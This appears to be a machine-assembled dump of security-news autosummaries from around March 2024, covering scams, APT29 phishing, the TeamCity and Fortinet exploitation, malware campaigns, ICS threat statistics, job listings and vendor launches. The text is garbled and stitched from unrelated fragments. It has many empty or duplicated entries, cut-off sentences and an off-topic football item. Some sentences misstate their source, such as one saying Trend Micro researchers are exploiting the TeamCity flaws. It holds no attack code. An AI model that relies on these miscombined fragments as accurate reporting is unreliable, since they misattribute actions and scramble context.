The combination of AI, analytics, behavioral science, social media, Internet of Things and other technologies enable bad actors to create and spread highly effective, mass-customized malinformation (or misinformation). “To bridge the gap, cybersecurity functions must build minimum effective expertise in these teams, using a combination of technology and training to generate only as much competence as is required to make cyber risk informed decisions autonomously,” Gopal concluded. "Scams directly targeting consumers continue to increase in both complexity and volume, according to Visa. Consumers are increasingly targeted by scammers, who rely on heightened emotions to create fraud opportunities. While the number of individual scam reports from June to December decreased, the total money lost increased, indicating scammers are targeting victims with more effective – and costly – scams. According to another Visa survey, more than one-third of adults surveyed decided not to report … More
The post Scams are becoming more convincing and costly appeared first on Help Net Security.
"Autosummary:
“With the use of generative AI and other emerging technologies, scams are more convincing than ever, leading to unprecedented losses for consumers,” said Paul Fabara, Chief Risk and Client Services Officer, Visa. "Developed by OpenAI, ChatGPT has garnered attention across industries for its ability to generate relevant responses to various queries. However, as the adoption of ChatGPT accelerates, so do discussions surrounding its ethical and security implications. Organizations grapple with questions about data privacy, content moderation, and potential misuse. In this round-up from Help Net Security, cybersecurity experts discuss various aspects of ChatGPT and its implications for cybersecurity. Complete videos Rodman Ramezanian, Global Cloud Threat Lead at … More
The post Cybercriminals use ChatGPT’s prompts as weapons appeared first on Help Net Security.
"Autosummary:
"APT29 (aka Cozy Bear, aka Midnight Blizzard) has been spotted targeting German political parties for the first time, Mandiant researchers have shared. Phishing leading to malware The attack started in late February 2024, with phishing emails containing bogus invitations to a dinner reception, ostensibly sent by the Christian Democratic Union (CDU), a major political party in Germany. Recipients were urged to follow a link to discover “all the necessary information about the event as well … More
The post APT29 hit German political parties with bogus invites and malware appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"DMP activates (and attempts to dereference) data loaded from memory that "looks like" a pointer," a team of seven academics from the University of Illinois Urbana-Champaign, University of Texas, Georgia Institute of Technology, University of California, Berkeley, University of Washington, and Carnegie Mellon University said. GoFetch, in a nutshell, demonstrates that "even if a victim correctly separates data from addresses by following the constant-time paradigm, the DMP will generate secret-dependent memory access on the victim"s behalf," rendering it susceptible to key-extraction attacks. "Autosummary:
The activity, which took place from March 7 through the week of March 11, targeted Israeli entities spanning global manufacturing, technology, and information security sectors, Proofpoint said. "Autosummary:
"Customers of bankrupt crypto platform BlockFi have been targeted with a very convincing phishing email impersonating the platform, asking them to connect their wallet to complete the withdrawal of remaining funds. Judging by this Reddit thread, many have fallen for the scam and have had their cryptowallet emptied. Web3 security consultant and threat researcher Plumferno says the scammers pilfered millions in just five days. The latest BlockFi phishing campaign BlockFi was a digital asset lender … More
The post Scammers steal millions from FTX, BlockFi claimants appeared first on Help Net Security.
"Autosummary:
They advise customers to be extra vigilant of email scams and be wary of non-standard communication attempts (e.g., via phone calls, text messages, or social media). "Autosummary:
"It is extremely disappointing that this matter continues to be an issue at some matches, particularly in the context of the next two years presenting such a tremendous opportunity to grow the sport in our region," Concacaf said. "Autosummary:
Tycoon 2FA attack overview (Sekoia) Evolution and scale Sekoia reports that the latest version of the Tycoon 2FA phishing kit, released this year, has introduced significant modifications that improve the phishing and evasion capabilities. Tycoon 2FA website (Sekoia) Tycoon 2FA attacks Tycoon 2FA attacks involve a multi-step process where the threat actor steals session cookies by using a reverse proxy server hosting the phishing web page, which intercepts the victim"s input and relays them to the legitimate service. "Autosummary:
Browser notification spam promoting affiliate scams Source: BleepingComputer In one instance, we received an alert for McAfee antivirus that led to a site claiming our system was infected with ten viruses, urging the visitor to "Scan now to remove viruses" or renew their license. Earlier this month, Google began rolling out a new feature called Google Search Generative Experience (SGE) in its search results, which provides AI-generated quick summaries for search queries, including recommendations for other sites to visit related to the query. "Autosummary:
As important as monitoring technologies like SIEM, EDR and MDR have become, it remains as true today as it ever has that every endpoint and server, whether they’re Windows, Macs, or Linux machines, needs a next-gen antivirus engine that can detect and stop known threats and block suspicious behaviour, such as malicious encryption. The library, a vast repository of over 170 million items, is still deep in the recovery process, but recently released an eighteen page cyber incident review describing the attack, its impact, the aftermath, and the lessons learned. "Autosummary:
OFAC also designated multiple other Russian fintech companies and their owners for working with OFAC-designated Rosbank, VTB Bank, Sberbank, Sovcombank, and the Central Bank of Russia to help Russian companies and nationals evade sanctions. "Autosummary:
CVE-2023-48788 Fortinet FortiClient EMS SQL Injection Vulnerability CVE-2021-44529 Ivanti Endpoint Manager Cloud Service Appliance (EPM CSA) Code Injection Vulnerability CVE-2019-7256 Nice Linear eMerge E3-Series OS Command Injection Vulnerability CVE-2023-48788 (CVSS score 9.3) is a critical pervasive SQL injection issue that resides in the DAS component. "Autosummary:
The affected information could include: Email address Full name Phone number Billing address Shipping address In certain cases, the affected data may also include order history, total order value, and information about the payment method used for the purchases.Vans notes that the payment method does not specify details like account number, just the method described as “credit card”, “Paypal”, or “bank account payment”, with no additional details attached. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "Autosummary:
Engage in open conversations to educate your children about the potential risks and equip them with strategies for navigating them safely: Teach kids how to critically evaluate online information and make conscious decisions on whether it’s real or fake Show them how to recognize and report cyberbullying Go through the tools they can use to protect their personal information such as two-factor authentication and a password manager and, if needed, help them set those up properly Chances are, younger children might be most interested in the games they can play on their devices. In today"s digital age, the internet plays a major role in young people’s lives, influencing how they further grow and develop into fully-fledged adults venturing out into the real world: From educational resources to social connections, discovering the latest viral dance trends, or watching how-to videos on how to cook pasta, the online world offers endless possibilities and resources. Cyberbullying, sexual predators, privacy invasions, malware, as well as phishing and other scams – all at least partly caused by ineffective or non-existent privacy and cybersecurity awareness and precautions – can detrimentally impact not only young people’s online safety, but their offline well-being too. 4. Stay ahead of emerging risks The digital landscape is constantly evolving, with new apps, trends, and online threats emerging regularly. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Outsmarting cybercriminal innovation with strategies for enterprise resilience In this Help Net Security interview, Pedro Cameirão, Head of Cyber Defense Center at Nokia, discusses emerging cybersecurity trends for 2024 and advises enterprises on preparation strategies. Cybersecurity jobs available right now: March 19, 2024 We’ve scoured the market to bring you a selection of roles that span various skill levels within … More
The post Week in review: Ivanti fixes RCE vulnerability, Nissan breach affects 100,000 individuals appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: March 22, 2024 Here’s a look at the most interesting products from the past week, featuring releases from Appdome, Drata, GlobalSign, Ordr, Portnox, Sonatype, Tufin, and Zoom. Security best practices for GRC teams In this Help Net Security video, Shrav Mehta, CEO at Secureframe, talks about security best practices for GRC teams, highlights areas that security learners should pay close attention to, and discusses how security leaders can automate specific processes. "Autosummary:
"While originally designed for help documentation, CHM files have also been exploited for malicious purposes, such as distributing malware, because they can execute JavaScript when opened," the company said. "Autosummary:
"Autosummary:
Invoice-themed email written in German (Unit42) Most targeted entities operate in the "high tech" space, followed by sectors like finance, legal services, manufacturing, government, utilities and energy, insurance, and construction. "Autosummary:
WINELOADER, per the Google Cloud subsidiary, has also been employed in an operation targeting diplomatic entities in the Czech Republic, Germany, India, Italy, Latvia, and Peru in late January 2024. "Autosummary:
Large-scale Sign1 malware campaign already infected 39,000+ WordPress sites Pierluigi Paganini March 23, 2024 March 23, 2024 A large-scale malware campaign, tracked as Sign1, has already compromised 39,000 WordPress sites in the last six months. "Autosummary:
It has been clarified that the invalidation of licenses impacts Russian companies and organizations engaging in architecture, design, construction, manufacturing, media, education and entertainment, building information modeling (BIM), computer-aided design (CAD), and computer-aided manufacturing (CAM). "As you may know, the European Union recently imposed new economic sanctions that, effective March 20, 2024, prohibit Microsoft from supplying certain management or design software (including cloud-based solutions) to entities incorporated in Russia. Some of the most important products that will have their license keys invalidated are: Microsoft Azure : Cloud platform for computing, analytics, storage, and networking services. "Autosummary:
Mozilla fixed Firefox zero-days exploited at Pwn2Own Vancouver 2024 Pierluigi Paganini March 23, 2024 March 23, 2024 Mozilla addressed two Firefox zero-day vulnerabilities exploited during the Pwn2Own Vancouver 2024 hacking competition. "Autosummary:
"Autosummary:
"Shadow IT – the use of software, hardware, systems and services that haven’t been approved by an organization’s IT/IT Sec departments – has been a problem for the last couple of decades, and a difficult area for IT leaders to manage effectively. Similarly to shadow IT, shadow AI refers to all the AI-enabled products and platforms being used within your organization that those departments don’t know about. While personal use of AI application can be … More
The post Shadow AI is the latest cybersecurity threat you need to prepare for appeared first on Help Net Security.
"Autosummary:
2. Build an acceptable use policy Once your AI use has been classified, an acceptable use policy for your entire organization needs to be laid out to ensure all employees know exactly what they can and cannot do when interacting with the approved AI-enabled applications.Inputting data or content into these applications can put intellectual property at risk 2) As the number of AI-enabled applications increases, the chance of misuse also increases, with aspects like data governance and regulations such as GDPR being key considerations 3) There is reputational risk related to unchecked AI output. "Autosummary:
"AcidPour"s expanded capabilities would enable it to better disable embedded devices including networking, IoT, large storage (RAIDs), and possibly ICS devices running Linux x86 distributions," security researchers Juan Andres Guerrero-Saade and Tom Hegel said. "Financially motivated hackers have been leveraging SmokeLoader malware in a series of phishing campaigns predominantly targeting Ukrainian government and administration organizations. The phishing campaign The Ukrainian SSSCIP State Cyber Protection Center (SCPC), together with the Palo Alto Networks Unit 42 research team, have been tracking a massive phishing campaign linked to the distribution of the SmokeLoader malware. They researchers specifically analyzed 23 phishing campaigns spanning between May and November 2023. During these short but massive … More
The post Attackers are targeting financial departments with SmokeLoader malware appeared first on Help Net Security.
"Autosummary:
It has been updated and modified over the years to follow technological advances and evolve its detection evasion techniques, such as “sandbox detection, obfuscated code using opaque predicates, encrypted function blocks, anti-debugging, anti-hooking, anti-vm, and custom imports.” "In light of the rise of “DDoS hacktivism” and the recent DDoS attacks aimed at disrupting French and Alabama government websites, the Cybersecurity and Infrastructure Security Agency (CISA) has updated its guidance of how governmental entities (but also other organizations) should respond to this type of attacks. DDoS attacks explained First and foremost, the document explains the main difference between a DoS attack (from a single source) and a DDoS attack (from multiple sources). “The … More
The post CISA: Here’s how you can foil DDoS attacks appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Tenable also pointed out that the shared architecture – where several customers have the same parent domain – could be a goldmine for attackers looking to exploit vulnerabilities like same-site attacks, cross-origin issues, and cookie tossing, effectively leading to unauthorized access, data leaks, and code execution. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Since then, two large-scale campaigns involving the malware have been detected in November 2023 and January 2024 targeting high tech, finance, professional and legal, manufacturing, government, energy, insurance, and construction sectors in the E.U. and the U.S. These attacks also aim to deliver a new variant of the stealer that packs in better obfuscation and anti-analysis techniques, while being propagated via invoice-themed emails bearing ZIP attachments, marking a shift from ISO files. "Autosummary:
The WineLoader backdoor features several similarities with other malware variants deployed in past APT29 attacks, such as "burnbatter", "myskybeat", and "beatdrop," suggesting a common developer. "Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Episode links: Sponsored by: Kiteworks – Step into the future of secure managed file transfer with Kiteworks. "WebCopilot is an open-source automation tool that enumerates a target’s subdomains and discovers bugs using various free tools. It simplifies the application security workflow and reduces reliance on manual scripting. “I built this solution to streamline the application security process, specifically the repetitive tasks involved in reconnaissance. It consolidates several popular open-source tools into a single script, saving time and effort,” Harshit Raj Singh, the creator of WebCopilot, told Help Net Security. WebCopilot automates tasks … More
The post WebCopilot: Open-source automation tool enumerates subdomains, detects bugs appeared first on Help Net Security.
"Autosummary:
It consolidates several popular open-source tools into a single script, saving time and effort,” Harshit Raj Singh, the creator of WebCopilot, told Help Net Security. "93% of IT professionals believe security threats are increasing in volume or severity, a significant rise from 47% last year, according to Thales. The number of enterprises experiencing ransomware attacks surged by over 27% in the past year. Despite this escalating threat, less than half of organizations have a formal ransomware plan in place, with 8% resorting to paying the ransom demands. Human error persists as major data breach factor Malware stands out as the … More
The post Malware stands out as the fastest-growing threat of 2024 appeared first on Help Net Security.
"Autosummary:
That said, enterprises are also looking at the opportunities that emerging technologies bring, with 22% planning to integrate generative AI into their security products and services in the next 12 months, and 33% planning to experiment integrating the technology. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
During last year"s Vancouver Pwn2Own, won by Team Synacktiv, hackers earned $1,035,000 and a Tesla car for 27 zero-days (and several bug collisions) in Windows 11, Microsoft Teams, Microsoft SharePoint, macOS, Ubuntu Desktop, VMware Workstation, Oracle VirtualBox, and Tesla"s Model 3. "Amid the constant drumbeat of successful cyberattacks, some fake data breaches have also cropped up to make sensational headlines. Unfortunately, even fake data breaches can have real repercussions. Earlier this year, a hacker on a criminal forum claimed to have stolen data on some 50 million Europcar customers. After investigation, the car rental company determined that the data claimed to have been stolen was completely bogus. In February 2024, someone created a fake news story … More
The post Fake data breaches: Countering the damage appeared first on Help Net Security.
"Autosummary:
Why fake data breaches matter Fake data breaches can hurt an organization’s security reputation, even if it quickly debunks the fake breach. 2. Have a clear communication plan To avoid a situation like the one the Maine Attorney General’s office found themselves in, it’s important for organizations to have a plan in place for a suspected data breach. "Autosummary:
Ilya Andreevich Gambashidze (Gambashidze), the founder of the Moscow-based company Social Design Agency (SDA), and Nikolai Aleksandrovich Tupikin (Tupikin), the CEO and current owner of Russia-based Company Group Structura LLC (Structura), have been accused of providing services to the Russian government in connection to a "foreign malign influence campaign. "Autosummary:
"Attackers are exploiting the recently patched JetBrains TeamCity auth bypass vulnerability (CVE-2024-27198) to deliver ransomware, cryptominers and remote access trojans (RATs), according to Trend Micro researchers. The CVE-2024-27198 timeline CVE-2024-27198, an authentication bypass vulnerability affecting the TeamCity server, has been disclosed and fixed in early March, along with CVE-2024-27199 – a directory traversal vulnerability in the same instance. Several proof-of-concept (PoC) exploits have since been published, and analysts started seeing massive exploitation of CVE-2024-27198 soon … More
The post Attackers are exploiting JetBrains TeamCity flaw to deliver a variety of malware appeared first on Help Net Security.
"Autosummary:
"Autosummary:
A majority of the attack attempts targeting its honeypot infrastructure originated from the U.S., U.K., China, the Netherlands, Germany, Bulgaria, Kuwait, Russia, Estonia, and India, it added. "Autosummary:
Daily downloads Source: Sucuri In the past six months, Sucuri"s scanners detected the malware on over 39,000 websites, while the latest attack wave, which has been underway since January 2024, has claimed 2,500 sites. "Autosummary:
"Autosummary:
Ransomware-focused automated workflows can scan files for malware and detonate them in a safe sandbox environment, deploy countermeasures instantly, verify employees have installed important tools like EDR systems on their devices, and perform other tasks much more efficiently than with manual efforts. Blink automated workflow: Isolate or unisolated a device on CrowdStrike Properly Encrypt Sensitive Data One of the defining shifts in ransomware gangs’ operations over the last few years is becoming more data-focused. What Organizations Can Do to Limit Ransomware Risk With the onslaught of ransomware attacks companies face and the ever-evolving tactics deployed by hackers, reducing your risks against this nefarious cyber threat calls for multiple layers of defense. Have a Solid Backup Strategy While encrypting important files prevents ransomware gangs from blackmailing you with the threat of publishing sensitive data, you’ll likely still want access to those files. "Autosummary:
"The visible, or "fake," manifest can mislead developers and even audit tools that rely on the data available in the npm registry database," JFrog said. "Autosummary:
" Code execution is needed because global themes are designed to change everything on a Plasma desktop, from icons to windows decorations, lock screens, splash screens, wallpapers, color schemes, and so on, using executable bash scripts.On Wednesday, the KDE team warned Linux users to exercise "extreme caution" when installing global themes, even from the official KDE Store, because these themes run arbitrary code on devices to customize the desktop"s appearance. "Autosummary:
Critical Fortinet’s FortiClient EMS flaw actively exploited in the wild Pierluigi Paganini March 21, 2024 March 21, 2024 Researchers released a PoC exploit for a critical flaw in Fortinet’s FortiClient Enterprise Management Server (EMS) software, which is actively exploited. "Autosummary:
Critical Fortinet’s FortiClient EMS flaw actively exploited in the wild Pierluigi Paganini March 21, 2024 March 21, 2024 Researchers released a PoC exploit for a critical flaw in Fortinet’s FortiClient Enterprise Management Server (EMS) software, which is actively exploited. "A total of 29% of web attacks targeted APIs over 12 months (January through December 2023), indicating that APIs are a focus area for cybercriminals, according to Akamai. API integration amplifies risk exposure for enterprises APIs are at the heart of digital transformation in organizations. However, the existence of APIs heightens the risk exposure of businesses and poses a significant security challenge. Commerce is the most attacked vertical with 44% of API attacks, followed by … More
The post API environments becoming hotspots for exploitation appeared first on Help Net Security.
"Autosummary:
The United States Securities and Exchange Commission (SEC), for example, has recently enacted new rules for public companies that require the disclosure of material security incidents, as well as detailed information about risks, security governance, and oversight. "According to the UAE Cybersecurity Council, in 2023, the UAE repelled over 50,000 cyberattacks daily. These findings, highlighted in a report from Frost & Sullivan (F&S), show the exponential growth of the region’s cybersecurity landscape – and serve as a sobering reminder of the rising threats that accompany it. As the GCC (Gulf Cooperation Council) cybersecurity industry continues to grow—F&S estimates it will triple in value by 2030 to reach $13.4 billion—countries in the region … More
The post Regulatory measures boost cybersecurity industry appeared first on Help Net Security.
"Autosummary:
Building a cyber resilient posture Saudi Arabia, the UAE, and Bahrain have also established the National Cybersecurity Authority, the National Electronic Security Authority, and the National Cybersecurity Centre, respectively, to oversee ongoing industry efforts. "Autosummary:
"Autosummary:
EINs are used by employers, sole proprietors, corporations, partnerships, non-profit associations, trusts, estates of decendents, government agencies, certain individuals, and other business entities. How to avoid falling for a tax scam Before acting on an email’s request, stop and think about the following: Remember: The IRS doesn’t ask taxpayers for personal or financial information over email, text messages, or social media channels. "An analysis of 100,000+ Windows malware samples has revealed the most prevalent techniques used by malware developers to successfully evade defenses, escalate privileges, execute the malware, and assure its persistence. Malware tactics and techniques The analyzed malware samples were most often delivered via malicious email attachments featuring macro-enabled documents, Windows shortcut files (LNK), ISO/VHD containers, and MSI installers. It should now come as a surprise that defense evasion is by far the most common tactic … More
The post The most prevalent malware behaviors and techniques appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" According to statistics published by NCC Group, the total number of ransomware cases in February 2024 increased by 46% from January, up from 285 to 416, led by LockBit (33%), Hunters (10%), BlackCat (9%), Qilin (9%), BianLian (8%), Play (7%), and 8Base (7%). "Autosummary:
The new version, dubbed BunnyLoader 3.0, was announced by its developer named Player (or Player_Bunny) on February 11, 2024, with rewritten modules for data theft, reduced payload size, and enhanced keylogging capabilities. "Autosummary:
"Autosummary:
"Autosummary:
The FTC"s advice is clear - it never tells consumers to move their money to "protect" it: The FTC will never send consumers to a Bitcoin ATM, tell them to go buy gold bars, or demand they withdraw cash and take it to someone in person. "Autosummary:
Trend Micro reported that threat actors can exploit CVE-2024-27198 to perform a broad range of malicious activities, including: Dropping the Jasmin ransomware Deploying the XMRig cryptocurrency miner Deploying Cobalt Strike beacons Deploying the SparkRAT backdoor Executing domain discovery and persistence commands “Threat actors might exploit CVE-2024-27198 or CVE-2024-27199 to bypass authentication on vulnerable On-Premise TeamCity servers and perform follow-on commands. Trend Micro researchers are exploiting the recently disclosed vulnerabilities CVE-2024-27198 (CVSS score: 9.8) and CVE-2024-27199 (CVSS score 7.3) security flaws in JetBrains TeamCity to deploy multiple malware families and gain administrative control over impacted systems. "Autosummary:
In a press release sent to BleepingComputer, the race organizer explains that the email account was hijacked on Sunday, March 17, 2024 and was followed by the threat actor sending fraudulent emails to an undisclosed number of people. "Ivanti has fixed a critical RCE vulnerability (CVE-2023-41724) in Ivanti Standalone Sentry that has been reported by researchers with the NATO Cyber Security Centre. Though the company is not aware of customers being compromised via the flaw, it “strongly encourages” them to implement the patch immediately. About CVE-2023-41724 Ivanti Standalone Sentry is an appliance that acts as a gateway between devices and an organization’s ActiveSync-enabled email servers (e.g., Microsoft Exchange Server) or backend resource (e.g., … More
The post Ivanti fixes RCE vulnerability reported by NATO cybersecurity researchers (CVE-2023-41724) appeared first on Help Net Security.
"Autosummary:
About CVE-2023-41724 Ivanti Standalone Sentry is an appliance that acts as a gateway between devices and an organization’s ActiveSync-enabled email servers (e.g., Microsoft Exchange Server) or backend resource (e.g., Microsoft Sharepoint server). "Autosummary:
"Central Investigations & Cybersecurity Analyst Meta | USA | On-site – View job details The successful candidate will be able to assess and analyze large amounts of data to identify sources of potential threats and abuses, operate independently in a fast-paced environment, and collaborate with teams across the company. In addition to having a strong investigative and analytical background, Meta is seeking an investigator with experience making risk-based decisions and who is passionate about protecting … More
The post Cybersecurity jobs available right now: March 19, 2024 appeared first on Help Net Security.
"Autosummary:
Director of Cybersecurity Endeavor | USA | On-site – View job details This hands-on, director-level role requires a blend of technical expertise, leadership abilities, and an understanding of cybersecurity governance, documentation, and training. Senior DevSecOps and IT Manager TestGorilla | EU | Remote – View job details TestGorilla are looking for a Senior Engineer Manager to lead their small DevSecOps and IT team of experienced engineers, responsible for developing, designing, and maintaining cloud infrastructure, DevOps tools and guidelines, and security and IT measures. "In this Help Net Security interview, Pedro Cameirão, Head of Cyber Defense Center at Nokia, discusses emerging cybersecurity trends for 2024 and advises enterprises on preparation strategies. Cameirão will speak at GISEC Global 2024 in Dubai, a conference and exhibition bringing together some of the brightest minds in cybersecurity. What emerging cybersecurity trends should enterprises be aware of in 2024, and how should they prepare for these new threats? We observe that threat actors are … More
The post Outsmarting cybercriminal innovation with strategies for enterprise resilience appeared first on Help Net Security.
"Autosummary:
The rise of advanced persistent threats (APTs), phishing-as-a-service, ransomware-as-a-service models, and nation-state-sponsored cyber-attacks further compounds the complexity of the threat landscape.These may include thorough vetting processes for employees with sensitive roles, systematic implementing least privileged access, introducing privileged management systems, network segregation, data loss prevention (DLP), and security monitoring, among others. To reduce the risk from supply-chain attacks, enterprises must implement supplier and third-party evaluation programs assessing their compliancy to cybersecurity best-practices, regulations, and industry standards. "Autosummary:
" Growing Abuse of Cloud Platforms and Popular CDNs The development comes as Resecurity revealed that threat actors are increasingly abusing public cloud services like Dropbox, GitHub, IBM Cloud, and Oracle Cloud Storage, as well as Web 3.0 data-hosting platforms built on the InterPlanetary File System (IPFS) protocol such as Pinata to generate fully undetectable (FUD) phishing URLs using phishing kits. "Autosummary:
Earth Krahang was observed exploiting the following vulnerabilities to deploy webshells on target servers and gain a foothold within victim networks: CVE-2023-32315: command execution on OpenFire CVE-2022-21587: command execution on Oracle Web Applications Desktop Integrator The spear-phishing messages used by the attackers are designed to deceive victims into opening attachments or clicking on embedded URL links, which ultimately result in the deployment of a backdoor on the victim’s machine.The threat actors used this infrastructure to host malicious payloads, proxy attack traffic, and send spear-phishing emails to government-related targets, leveraging compromised government email accounts. "SUSE announced enhancements across its cloud native and Edge portfolio to enable customers to securely deploy and manage business-critical workloads anywhere. New capabilities in Rancher Prime 3.0, SUSE’s commercial offering of Rancher and SUSE Edge 3.0 commit to enabling choice and providing secure platforms through 100 percent open source solutions. “At SUSE, our commercial and open source users are equally important,” said Peter Smails, GM of the SUSE Enterprise Container Management business unit. “As such, … More
The post SUSE announces new enhancements to help users manage business-critical workloads appeared first on Help Net Security.
"Autosummary:
SUSE is also introducing Rancher Enterprise, a single package and price for the entire portfolio of Rancher Prime including multi-cluster management, OS management, VM management, persistent storage, and SUSE’s certified Linux OS, SUSE Linux Enterprise Micro. Security and lifecycle management, enabling self-service PaaS with Rancher Prime New capabilities in Rancher Prime 3.0 help platform engineering teams deliver self-service Platform-as-a-Service (PaaS) to their developer communities, and enhanced support for AI workloads. "Proof-of-concept (PoC) exploit code for a critical RCE vulnerability (CVE-2024-25153) in Fortra FileCatalyst MFT solution has been published. About CVE-2024-25153 Fortra FileCatalyst is an enterprise managed file transfer (MFT) software solution that includes several components: FileCatalyst Direct, Workflow, and Central. CVE-2024-25153 is a directory traversal vulnerability in FileCatalyst Workflow’s web portal that could allow a remote authenticated threat actor to execute arbitrary code on vulnerable servers. “A directory traversal within the ‘ftpservlet’ of the FileCatalyst … More
The post PoC exploit for critical Fortra FileCatalyst MFT vulnerability released (CVE-2024-25153) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" "How does our cybersecurity spending compare to our competitors?" Instead, encouraging the board to ask strategic questions like, "What resources do we need to feel comfortable with our level of risk?" transforms the dialogue.For example, among major US corporations, 51% of Fortune 100 companies have at least one director with a background in information security, while this figure drops to only 17% for S&P 500 companies and further declines to just 9% for companies listed in the Russell 3000 Index, highlighting a significant variation in cybersecurity expertise at the board level across different sizes of businesses.Speak the Language of the Board: Perform a Business Impact Analysis and translate technical cybersecurity risks into business terms that resonate with the board, such as financial impact, regulatory compliance, and reputational damage.The surge in cyber threats, coupled with their capacity to disrupt business operations, erode customer trust, and incur significant financial losses, underscores the strategic value of robust cybersecurity measures.For C-suite executives and board members, staying ahead of these regulations and integrating their requirements into your company"s cybersecurity strategy is now an indispensable part of the job, emphasizing the need for a strategic, informed approach to cybersecurity governance. "Autosummary:
"Autosummary:
"Autosummary:
2023 in numbers Parameter H1 2023 H2 2023 2023 Global percentage of attacked ICS computers 34.0% 31.9% 38.6% Main threat sources Internet 19.3% 18.1% 22.8% Email clients 6.0% 4.0% 5.4% Removable media 3.4% 1.9% 3.2% Network folders 0.49% 0.25% 0.45% Percentage of ICS computers on which malicious objects from different categories were blocked Malicious scripts and phishing pages (JS and HTML) 12.7% 10.9% 14.7% Denylisted internet resources 11.3% 10.1% 13.7% Spy Trojans, backdoors and keyloggers 6.1% 5.3% 7.1% Malicious documents (Microsoft Office and PDF) 4.0% 2.9% 4.0% Worms 2.3% 2.1% 3.0% Viruses 2.4% 2.1% 2.8% Web miners running in browsers 1.3% 0.76% 1.3% Miners in the form of executable files for Windows 0.59% 0.85% 1.1% Ransomware 0.32% 0.25% 0.37% 2023 Back to the minimum Following the increase of 2021 and 2022, the percentage of ICS computers on which malicious objects were blocked dropped by 2 pp and returned to the same level as in 2020. Regions Africa Africa leads the rankings for Percentage of ICS computers on which spyware was blocked was blocked Percentage of ICS computers on which worms were blocked were blocked Percentage of ICS computers on which web miners were blocked were blocked Percentage of ICS computers on which removable media threats were blocked.This group includes Windows computers that serve one or several of the following purposes: Supervisory control and data acquisition (SCADA) servers Data storage (Historian) servers Data gateways (OPC) Stationary workstations of engineers and operators Mobile workstations of engineers and operators Human machine interface (HMI) OT network administration computers ICS software development computers We consider a computer as attacked if a Kaspersky security solution blocked one or more threats on that computer during the period in review: a month, six months, or a year depending on the context as can be seen in the charts above. Percentage of ICS computers on which malicious objects from various sources were blocked, 2020–2023 Red lines of 2023 By the end of 2023, the percentage of ICS computers on which malicious objects were blocked increased in two regions: Eastern Europe, by 4.4 pp Western Europe, by 3.5 pp Regions and world. Percentage of ICS computers on which malicious objects from various sources were blocked Percentage of ICS computers on which threats from network folders were blocked As in the case of the statistics across all threats, the percentage of ICS computers where malicious objects from various sources were blocked varied with region.Percentage of ICS computers on which malicious objects were blocked, January–December 2022 and 2023 In Eastern Europe, H1 2023 saw the lowest figures since 2020, and H2, the highest percentage of attacked ICS computers in 2020-2023 (30.9%). Fifteen countries and territories with the highest percentage of ICS computers on which spyware was blocked, H2 2023 Ransomware In the second half of 2023, the percentage of ICS computers on which ransomware was blocked dropped to the four-year minimum of 0.25%. Regions ranked by percentage of ICS computers on which malicious scripts and phishing pages were blocked, H2 2023 The percentage of ICS computers on which malicious objects in this category were blocked increased in six regions within the six-month period, most of all in Eastern Europe (by 2.9 pp). Regions ranked by percentage of ICS computers on which malicious email attachments and phishing links were blocked, H2 2023 Removable media As before, Africa led the regional ranking by percentage of ICS computers on which removable media threats were blocked. Regions ranked by percentage of ICS computers on which denylisted internet resources were blocked, H2 2023 Tajikistan and Yemen led the country ranking by percentage of ICS computers on which denylisted internet resources were blocked, with 18.2% and 16.6%, respectively. Regions ranked by percentage of ICS computers on which malicious documents were blocked, H2 2023 Greece and Mexico led the country and territory ranking by percentage of ICS computers on which malicious documents were blocked with 9.4% and 8.5%, respectively. Ten countries and territories with the lowest percentage of ICS computers on which malicious objects were blocked in H2 2023 Selected industries In H2 2023, building automation once again had the highest percentage of ICS computers on which malicious objects were blocked of all industries that we studied. Percentage of ICS computers on which malicious objects were blocked, by month, 2021-2023 In terms of month-to-month fluctuations, the year 2023 differs from the two that preceded it, while being closer to 2021 than to 2022. Regions ranked by percentage of ICS computers on which browser-based web miners were blocked, H2 2023 Yemen (3.9%) and Serbia (3.5%) topped the ranking of countries and territories by percentage of ICS computers on which web miners were blocked.Percentage of ICS computers on which malicious objects were blocked, by half year, 2020–2023 The percentage of attacked ICS computers in Western Europe each month in 2023, with the exception of January, represented a year-on-year increase. "Autosummary:
Code comparison showing functional similarities (@juanandres_gs) AcidPour shares input/output control (IOCTL)-based wiping logic with VPNFilter"s "dstr" plugin and AcidRain, indicating a continuation or adaptation of the previously documented malicious techniques. "CalypsoAI has launched the CalypsoAI Platform, a SaaS-based security and enablement solution for generative AI applications within the enterprise. With the new model-agnostic SaaS platform, technology, innovation, and security leaders can harness the power of generative AI and large language models (LLMs) across their enterprise safely and securely. According to a recent Boston Consulting Group survey of more than 1,400 C-suite executives, 90% of leaders are still waiting for generative AI to move beyond the … More
The post CalypsoAI Platform provides real-time LLM cybersecurity insights appeared first on Help Net Security.
"Autosummary:
In addition, the Platform offers: Security and observability across all LLM usage : With new observability and visibility dashboards, users get a first-of-its-kind solution to scan, flag, alert, and protect systems against common vulnerabilities and internal and external risks in real time. : With new observability and visibility dashboards, users get a first-of-its-kind solution to scan, flag, alert, and protect systems against common vulnerabilities and internal and external risks in real time. "Autosummary:
How to Protect Your APIs Imperva offers several recommendations to help organizations improve their API Security posture: Discover, classify, and inventory all APIs, endpoints, parameters, and payloads.When successful, these attacks can lock customers out of their accounts, provide criminals with sensitive data, contribute to revenue loss, and increase the risk of non-compliance. In their report, Imperva identified three common types of mismanaged API endpoints that create security risks for organizations: shadow, deprecated, and unauthenticated APIs. "Autosummary:
"Autosummary:
